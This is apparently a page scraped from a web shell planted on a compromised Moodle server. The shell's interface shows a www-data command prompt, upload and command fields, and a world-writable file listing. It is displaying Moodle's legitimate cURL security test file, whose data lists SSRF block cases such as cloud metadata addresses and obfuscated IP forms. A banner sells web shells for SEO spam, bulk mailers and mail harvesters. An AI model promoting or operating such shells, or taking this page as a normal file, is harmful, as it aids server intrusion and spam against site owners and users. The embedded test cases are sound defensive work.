__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        

            For_More_Tools:
            
                Telegram: @jackleet | Bulk Smtp support mail sender  | Business Mail Collector  |  Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private

Upload:

Command:

www-data@216.73.216.10: ~ $ 
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

namespace core;

/**
 * cURL security test suite.
 *
 * Note: The curl_security_helper class performs forward and reverse DNS look-ups in some cases. This class will not attempt to test
 * this functionality as look-ups can vary from machine to machine. Instead, human testing with known inputs/outputs is recommended.
 *
 * @package    core
 * @copyright  2016 Jake Dallimore <jrhdallimore@gmail.com>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
final class curl_security_helper_test extends \advanced_testcase {
    /**
     * Test for \core\files\curl_security_helper::url_is_blocked().
     *
     * @param array $dns a mapping between hosts and IPs to be used instead of a real DNS lookup. The values must be arrays.
     * @param string $url the url to validate.
     * @param string $blockedhosts the list of blocked hosts.
     * @param string $allowedports the list of allowed ports.
     * @param bool $expected the expected result.
     * @dataProvider curl_security_url_data_provider
     */
    public function test_curl_security_helper_url_is_blocked($dns, $url, $blockedhosts, $allowedports, $expected): void {
        $this->resetAfterTest(true);
        $helper = $this->getMockBuilder('\core\files\curl_security_helper')
            ->onlyMethods(['get_host_list_by_name'])
            ->getMock();

        // Override the get host list method to return hard coded values based on a mapping provided by $dns.
        $helper->method('get_host_list_by_name')->will(
            $this->returnCallback(
                function($host) use ($dns) {
                    return isset($dns[$host]) ? $dns[$host] : [];
                }
            )
        );

        set_config('curlsecurityblockedhosts', $blockedhosts);
        set_config('curlsecurityallowedport', $allowedports);
        $this->assertEquals($expected, $helper->url_is_blocked($url));
    }

    /**
     * Data provider for test_curl_security_helper_url_is_blocked().
     *
     * @return array
     */
    public static function curl_security_url_data_provider(): array {
        $simpledns = ['localhost' => ['127.0.0.1']];
        $multiplerecorddns = [
            'sub.example.com' => ['1.2.3.4', '5.6.7.8']
        ];
        // Format: url, blocked hosts, allowed ports, expected result.
        return [
            // Base set without the blocklist enabled - no checking takes place.
            [$simpledns, "http://localhost/x.png", "", "", false],       // IP=127.0.0.1, Port=80 (port inferred from http).
            [$simpledns, "http://localhost:80/x.png", "", "", false],    // IP=127.0.0.1, Port=80 (specific port overrides http scheme).
            [$simpledns, "https://localhost/x.png", "", "", false],      // IP=127.0.0.1, Port=443 (port inferred from https).
            [$simpledns, "http://localhost:443/x.png", "", "", false],   // IP=127.0.0.1, Port=443 (specific port overrides http scheme).
            [$simpledns, "localhost/x.png", "", "", false],              // IP=127.0.0.1, Port=80 (port inferred from http fallback).
            [$simpledns, "localhost:443/x.png", "", "", false],          // IP=127.0.0.1, Port=443 (port hard specified, despite http fallback).
            [$simpledns, "http://127.0.0.1/x.png", "", "", false],       // IP=127.0.0.1, Port=80 (port inferred from http).
            [$simpledns, "127.0.0.1/x.png", "", "", false],              // IP=127.0.0.1, Port=80 (port inferred from http fallback).
            [$simpledns, "http://localhost:8080/x.png", "", "", false],  // IP=127.0.0.1, Port=8080 (port hard specified).
            [$simpledns, "http://192.168.1.10/x.png", "", "", false],    // IP=192.168.1.10, Port=80 (port inferred from http).
            [$simpledns, "https://192.168.1.10/x.png", "", "", false],   // IP=192.168.1.10, Port=443 (port inferred from https).
            [$simpledns, "http://sub.example.com/x.png", "", "", false], // IP=::1, Port = 80 (port inferred from http).
            [$simpledns, "http://s-1.d-1.com/x.png", "", "", false],     // IP=::1, Port = 80 (port inferred from http).

            // Test set using domain name filters but with all ports allowed (empty).
            [$simpledns, "http://localhost/x.png", "localhost", "", true],
            [$simpledns, "localhost/x.png", "localhost", "", true],
            [$simpledns, "localhost:0/x.png", "localhost", "", true],
            [$simpledns, "ftp://localhost/x.png", "localhost", "", true],
            [$simpledns, "http://sub.example.com/x.png", "localhost", "", false],
            [$simpledns, "http://example.com/x.png", "example.com", "", true],
            [$simpledns, "http://sub.example.com/x.png", "example.com", "", false],

            // Test set using wildcard domain name filters but with all ports allowed (empty).
            [$simpledns, "http://sub.example.com/x.png", "*.com", "", true],
            [$simpledns, "http://example.com/x.png", "*.example.com", "", false],
            [$simpledns, "http://sub.example.com/x.png", "*.example.com", "", true],
            [$simpledns, "http://sub.example.com/x.png", "*.sub.example.com", "", false],
            [$simpledns, "http://sub.example.com/x.png", "*.example", "", false],

            // Test set using IP address filters but with all ports allowed (empty).
            [$simpledns, "http://localhost/x.png", "127.0.0.1", "", true],
            [$simpledns, "http://127.0.0.1/x.png", "127.0.0.1", "", true],

            // Test set using CIDR IP range filters but with all ports allowed (empty).
            [$simpledns, "http://localhost/x.png", "127.0.0.0/24", "", true],
            [$simpledns, "http://127.0.0.1/x.png", "127.0.0.0/24", "", true],

            // Test set using last-group range filters but with all ports allowed (empty).
            [$simpledns, "http://localhost/x.png", "127.0.0.0-30", "", true],
            [$simpledns, "http://127.0.0.1/x.png", "127.0.0.0-30", "", true],

            // Test set using port filters but with all hosts allowed (empty).
            [$simpledns, "http://localhost/x.png", "", "80\n443", false],
            [$simpledns, "http://localhost:80/x.png", "", "80\n443", false],
            [$simpledns, "https://localhost/x.png", "", "80\n443", false],
            [$simpledns, "http://localhost:443/x.png", "", "80\n443", false],
            [$simpledns, "http://sub.example.com:8080/x.png", "", "80\n443", true],
            [$simpledns, "http://sub.example.com:-80/x.png", "", "80\n443", true],
            [$simpledns, "http://sub.example.com:aaa/x.png", "", "80\n443", true],

            // Test set using port filters and hosts filters.
            [$simpledns, "http://localhost/x.png", "127.0.0.1", "80\n443", true],
            [$simpledns, "http://127.0.0.1/x.png", "127.0.0.1", "80\n443", true],

            // Test using multiple A records.
            // Multiple record DNS gives two IPs for the same host, we want to make
            // sure that if we block one of those (doesn't matter which one)
            // the request is blocked.
            [$multiplerecorddns, "http://sub.example.com", '1.2.3.4', "", true],
            [$multiplerecorddns, "http://sub.example.com", '5.6.7.8', "", true],

            // Test when DNS resolution fails.
            [[], "http://example.com", "127.0.0.1", "", true],

            // Test ensures that the default value of getremoteaddr() 0.0.0.0 will check against the provided blocked list.
            [$simpledns, "http://0.0.0.0/x.png", "0.0.0.0", "", true],
            // Test set using IPV4 with integer format.
            [$simpledns, "http://2852039166/x.png", "169.254.169.254", "", true],

            // Test some freaky deaky Unicode domains. Should be blocked always.
            [$simpledns, "http://169。254。169。254/", "127.0.0.1", "", true],
            [$simpledns, "http://169。254。169。254/", "1.2.3.4", "", true],
            [$simpledns, "http://169。254。169。254/", "127.0.0.1", "80\n443", true]

            // Note on testing URLs using IPv6 notation:
            // At present, the curl_security_helper class doesn't support IPv6 url notation.
            // E.g.  http://[ad34::dddd]:port/resource
            // This is because it uses clean_param(x, PARAM_URL) as part of parsing, which won't validate urls having IPv6 notation.
            // The underlying IPv6 address and range support is in place, however, so if clean_param is changed in future,
            // please add the following test sets.
            // 1. ["http://[::1]/x.png", "", "", false]
            // 2. ["http://[::1]/x.png", "::1", "", true]
            // 3. ["http://[::1]/x.png", "::1/64", "", true]
            // 4. ["http://[fe80::dddd]/x.png", "fe80::cccc-eeee", "", true]
            // 5. ["http://[fe80::dddd]/x.png", "fe80::dddd/128", "", true].
        ];
    }

    /**
     * Test for \core\files\curl_security_helper->is_enabled().
     *
     * @param string $blockedhosts the list of blocked hosts.
     * @param string $allowedports the list of allowed ports.
     * @param bool $expected the expected result.
     * @dataProvider curl_security_settings_data_provider
     */
    public function test_curl_security_helper_is_enabled($blockedhosts, $allowedports, $expected): void {
        $this->resetAfterTest(true);
        $helper = new \core\files\curl_security_helper();
        set_config('curlsecurityblockedhosts', $blockedhosts);
        set_config('curlsecurityallowedport', $allowedports);
        $this->assertEquals($expected, $helper->is_enabled());
    }

    /**
     * Data provider for test_curl_security_helper_is_enabled().
     *
     * @return array
     */
    public static function curl_security_settings_data_provider(): array {
        // Format: blocked hosts, allowed ports, expected result.
        return [
            ["", "", false],
            ["127.0.0.1", "", true],
            ["localhost", "", true],
            ["127.0.0.0/24\n192.0.0.0/24", "", true],
            ["", "80\n443", true],
        ];
    }

    /**
     * Test for \core\files\curl_security_helper::host_is_blocked().
     *
     * @param string $host the host to validate.
     * @param string $blockedhosts the list of blocked hosts.
     * @param bool $expected the expected result.
     * @dataProvider curl_security_host_data_provider
     */
    public function test_curl_security_helper_host_is_blocked($host, $blockedhosts, $expected): void {
        $this->resetAfterTest(true);
        $helper = new \core\files\curl_security_helper();
        set_config('curlsecurityblockedhosts', $blockedhosts);
        $this->assertEquals($expected, \phpunit_util::call_internal_method($helper, 'host_is_blocked', [$host],
                                                                          '\core\files\curl_security_helper'));
    }

    /**
     * Data provider for test_curl_security_helper_host_is_blocked().
     *
     * @return array
     */
    public static function curl_security_host_data_provider(): array {
        return [
            // IPv4 hosts.
            ["127.0.0.1", "127.0.0.1", true],
            ["127.0.0.1", "127.0.0.0/24", true],
            ["127.0.0.1", "127.0.0.0-40", true],
            ["", "127.0.0.0/24", false],

            // IPv6 hosts.
            // Note: ["::", "::", true], - should match but 'address_in_subnet()' has trouble with fully collapsed IPv6 addresses.
            ["::1", "::1", true],
            ["::1", "::0-cccc", true],
            ["::1", "::0/64", true],
            ["FE80:0000:0000:0000:0000:0000:0000:0000", "fe80::/128", true],
            ["fe80::eeee", "fe80::ddde/64", true],
            ["fe80::dddd", "fe80::cccc-eeee", true],
            ["fe80::dddd", "fe80::ddde-eeee", false],

            // Domain name hosts.
            ["example.com", "example.com", true],
            ["sub.example.com", "example.com", false],
            ["example.com", "*.com", true],
            ["example.com", "*.example.com", false],
            ["sub.example.com", "*.example.com", true],
            ["sub.sub.example.com", "*.example.com", true],
            ["sub.example.com", "*example.com", false],
            ["sub.example.com", "*.example", false],

            // International domain name hosts.
            ["xn--nw2a.xn--j6w193g", "xn--nw2a.xn--j6w193g", true], // The domain 見.香港 is ace-encoded to xn--nw2a.xn--j6w193g.
        ];
    }

    /**
     * Test for \core\files\curl_security_helper->port_is_blocked().
     *
     * @param int|string $port the port to validate.
     * @param string $allowedports the list of allowed ports.
     * @param bool $expected the expected result.
     * @dataProvider curl_security_port_data_provider
     */
    public function test_curl_security_helper_port_is_blocked($port, $allowedports, $expected): void {
        $this->resetAfterTest(true);
        $helper = new \core\files\curl_security_helper();
        set_config('curlsecurityallowedport', $allowedports);
        $this->assertEquals($expected, \phpunit_util::call_internal_method($helper, 'port_is_blocked', [$port],
                                                                          '\core\files\curl_security_helper'));
    }

    /**
     * Data provider for test_curl_security_helper_port_is_blocked().
     *
     * @return array
     */
    public static function curl_security_port_data_provider(): array {
        return [
            ["", "80\n443", true],
            [" ", "80\n443", true],
            ["-1", "80\n443", true],
            [-1, "80\n443", true],
            ["n", "80\n443", true],
            [0, "80\n443", true],
            ["0", "80\n443", true],
            [8080, "80\n443", true],
            ["8080", "80\n443", true],
            ["80", "80\n443", false],
            [80, "80\n443", false],
            [443, "80\n443", false],
            [0, "", true], // Port 0 and below are always invalid, even when the admin hasn't set allowed entries.
            [-1, "", true], // Port 0 and below are always invalid, even when the admin hasn't set allowed entries.
            [null, "", true], // Non-string, non-int values are invalid.
        ];
    }

    /**
     * Test for \core\files\curl_security_helper::get_blocked_url_string().
     */
    public function test_curl_security_helper_get_blocked_url_string(): void {
        $helper = new \core\files\curl_security_helper();
        $this->assertEquals(get_string('curlsecurityurlblocked', 'admin'), $helper->get_blocked_url_string());
    }
}

Filemanager

DIR : / var/ www/ html/ vcom/ lib/ tests/
Name Type Size Permission Actions
analytics Folder 0777
behat Folder 0777
classes Folder 0777
content Folder 0777
context Folder 0777
db Folder 0777
event Folder 0777
external Folder 0777
fixtures Folder 0777
hook Folder 0777
hub Folder 0777
lock Folder 0777
moodlenet Folder 0777
navigation Folder 0777
oauth2 Folder 0777
other Folder 0777
output Folder 0777
performance Folder 0777
plugininfo Folder 0777
privacy Folder 0777
route Folder 0777
router Folder 0777
session Folder 0777
task Folder 0777
accesslib_has_capability_test.php File 29.76 KB 0777
accesslib_test.php File 245.63 KB 0777
adminlib_test.php File 7.42 KB 0777
admintree_test.php File 18.08 KB 0777
ajaxlib_test.php File 4.45 KB 0777
analysers_test.php File 12.71 KB 0777
antivirus_test.php File 11.98 KB 0777
attribute_helper_test.php File 8.41 KB 0777
authlib_test.php File 22.97 KB 0777
behat_lib_test.php File 3.3 KB 0777
blocklib_test.php File 36.31 KB 0777
check_test.php File 2.31 KB 0777
client_test.php File 4.32 KB 0777
collator_test.php File 12.1 KB 0777
completionlib_test.php File 92.46 KB 0777
component_test.php File 49.28 KB 0777
componentlib_test.php File 6.93 KB 0777
configonlylib_test.php File 8.95 KB 0777
content_test.php File 4.79 KB 0777
context_block_test.php File 4.17 KB 0777
context_helper_test.php File 22.28 KB 0777
context_test.php File 3.42 KB 0777
core_media_player_native_test.php File 6.44 KB 0777
core_renderer_template_exploit_test.php File 16.54 KB 0777
core_renderer_test.php File 7.57 KB 0777
core_userfeedback_test.php File 2.3 KB 0777
coverage.php File 3.27 KB 0777
cron_test.php File 6.82 KB 0777
csvclass_test.php File 5.66 KB 0777
curl_security_helper_test.php File 14.88 KB 0777
customcontext_test.php File 4.67 KB 0777
dataformat_test.php File 4.18 KB 0777
datalib_test.php File 48.97 KB 0777
datalib_update_with_unique_index_test.php File 6.12 KB 0777
date_legacy_test.php File 13.67 KB 0777
date_test.php File 30.4 KB 0777
deprecation_test.php File 15.78 KB 0777
di_test.php File 5.33 KB 0777
editorlib_test.php File 1.96 KB 0777
emoticon_manager_test.php File 4.2 KB 0777
encryption_test.php File 9.48 KB 0777
environment_test.php File 9.12 KB 0777
exporter_test.php File 16.83 KB 0777
externallib_test.php File 2.03 KB 0777
filelib_test.php File 83.89 KB 0777
filestorage_zip_archive_test.php File 2.54 KB 0777
filetypes_test.php File 10.09 KB 0777
filter_manager_test.php File 3.33 KB 0777
filterlib_test.php File 37.09 KB 0777
formatting_test.php File 26.09 KB 0777
formslib_test.php File 40.1 KB 0777
gdlib_test.php File 5.73 KB 0777
googlelib_test.php File 1.62 KB 0777
gradelib_test.php File 12.01 KB 0777
grades_external_test.php File 11.22 KB 0777
grading_external_test.php File 26.55 KB 0777
graphlib_test.php File 7.14 KB 0777
grouplib_test.php File 110.79 KB 0777
h5p_clean_orphaned_records_task_test.php File 3.17 KB 0777
html2text_test.php File 8.82 KB 0777
htmlpurifier_test.php File 23.11 KB 0777
http_client_test.php File 14.67 KB 0777
ip_utils_test.php File 19.55 KB 0777
jquery_test.php File 1.59 KB 0777
ldaplib_test.php File 17.77 KB 0777
licenselib_test.php File 11.84 KB 0777
locale_test.php File 4.96 KB 0777
lock_config_test.php File 3.48 KB 0777
lock_test.php File 5.34 KB 0777
markdown_test.php File 2.27 KB 0777
mathslib_test.php File 13.51 KB 0777
medialib_test.php File 19.68 KB 0777
message_test.php File 16.43 KB 0777
messagelib_test.php File 56.44 KB 0777
minify_test.php File 3.15 KB 0777
modinfolib_test.php File 99.71 KB 0777
moodle_page_test.php File 34.62 KB 0777
moodlelib_current_language_test.php File 7.68 KB 0777
moodlelib_partial_test.php File 4.48 KB 0777
moodlelib_test.php File 239.56 KB 0777
myprofilelib_test.php File 12.2 KB 0777
navigationlib_test.php File 32.56 KB 0777
notification_test.php File 4.37 KB 0777
oauth2_test.php File 23.16 KB 0777
outputcomponents_test.php File 34.31 KB 0777
outputfactories_test.php File 6.83 KB 0777
outputrenderers_test.php File 1.63 KB 0777
outputrequirementslib_test.php File 15.72 KB 0777
param_test.php File 4.11 KB 0777
pdflib_test.php File 3.21 KB 0777
persistent_test.php File 30.68 KB 0777
phpxmlrpc_test.php File 2.05 KB 0777
plugin_manager_test.php File 31.47 KB 0777
portfoliolib_test.php File 8.41 KB 0777
progress_display_test.php File 3.76 KB 0777
progress_test.php File 14.53 KB 0777
qrcode_test.php File 1.69 KB 0777
questionlib_test.php File 108.63 KB 0777
regex_test.php File 1.56 KB 0777
report_helper_test.php File 7 KB 0777
requirejs_test.php File 2.23 KB 0777
router_test.php File 3.85 KB 0777
rsslib_test.php File 7.41 KB 0777
rtlcss_test.php File 57.07 KB 0777
sample_questions.ser File 141.76 KB 0777
sample_questions.xml File 102.62 KB 0777
sample_questions_with_old_image_tag.ser File 4.85 KB 0777
sample_questions_with_old_image_tag.xml File 4.08 KB 0777
sample_questions_wrong.xml File 102.57 KB 0777
scss_test.php File 4.31 KB 0777
session_redis_cluster_test.php File 4.17 KB 0777
sessionlib_test.php File 12.37 KB 0777
setuplib_test.php File 20.21 KB 0777
statslib_test.php File 26.82 KB 0777
stored_progress_bar_test.php File 7.17 KB 0777
string_manager_standard_test.php File 10.23 KB 0777
system_clock_test.php File 2.42 KB 0777
text_test.php File 26.68 KB 0777
theme_config_test.php File 7.25 KB 0777
update_api_test.php File 6.65 KB 0777
update_checker_test.php File 10.91 KB 0777
update_code_manager_test.php File 9.12 KB 0777
update_validator_test.php File 18.32 KB 0777
upgrade_util_test.php File 5.36 KB 0777
upgradelib_test.php File 75.43 KB 0777
url_test.php File 25.48 KB 0777
user_menu_test.php File 3.83 KB 0777
user_test.php File 42.3 KB 0777
useragent_test.php File 67.06 KB 0777
weblib_format_text_test.php File 14.21 KB 0777
weblib_test.php File 42.12 KB 0777
xhprof_test.php File 10.05 KB 0777
xmlize_test.php File 2.57 KB 0777
xsendfilelib_test.php File 5 KB 0777

Copyright reserved © 2026 xtooler.online Shell Coded By Mr.X

Filemanager